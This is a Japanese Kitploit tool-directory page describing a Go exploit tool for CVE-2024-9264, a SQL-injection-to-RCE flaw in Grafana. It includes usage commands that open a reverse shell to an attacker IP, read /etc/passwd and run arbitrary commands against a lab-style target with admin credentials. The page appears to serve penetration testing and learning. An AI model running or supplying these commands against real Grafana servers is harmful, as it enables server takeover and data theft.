Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-9264 — Grafana バージョン 11.0.x、11.1.x、および 11.2.x に影響を与える CVE-2024-9264 の Go 実装 | Kitploit
ツール/GitHubGitHub/cythonic1/cve-2024-9264
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubcythonic1/cve-2024-9264

CVE-2024-9264

Grafana バージョン 11.0.x、11.1.x、および 11.2.x に影響を与える CVE-2024-9264 の Go 実装

リポジトリを見る
311年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
ウェブサイト
共有

🚨 CVE-2024-9264 - Grafana SQLインジェクションによるリモートコード実行(RCE)とファイル読み取り

CVE-2024-9264 のエクスプロイトツール。Grafanaの重大な脆弱性で、認証された攻撃者がSQLクエリを実行し、RCEに至る可能性があります。

🛡️ このツールは厳格に教育目的および許可されたペネトレーションテストのために使用されます。
許可されていない使用は違法かつ非倫理的です。


🧠 脆弱性の概要

🕳️ CVE-2024-9264とは?

CVE-2024-9264 はGrafanaにおける重大な欠陥で、認証された攻撃者がSQLコマンドを実行し、RCEやファイル読み取りを引き起こすことを許します。

🧬 根本原因

  • 不十分なサニタイゼーション。

💥 影響

  • RCE: 任意のコマンドの実行、リバースシェルの取得、機密ファイルの読み取りが可能。
  • 重大な深刻度: 成功した場合、サーバー完全乗っ取りの可能性があります。

⚒️ 機能

  • 複数の攻撃モードをサポート:
    • file – 任意のファイルの読み取り(例: /etc/passwd)
    • shell – 攻撃者マシンへのリバースシェル
    • command – 任意のシェルコマンドの実行(例: whoami)
  • 攻撃者のIP、ポート、認証情報をカスタマイズ可能

🚀 使い方

ヘルプメニュー

すべての引数が必要なわけではありません。

例

シェルの取得

go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell

ファイルの読み取り

go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd

単一コマンドの実行

go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'

🔧 コマンドラインフラグ

go run main.go [flags]

ツールをダウンロード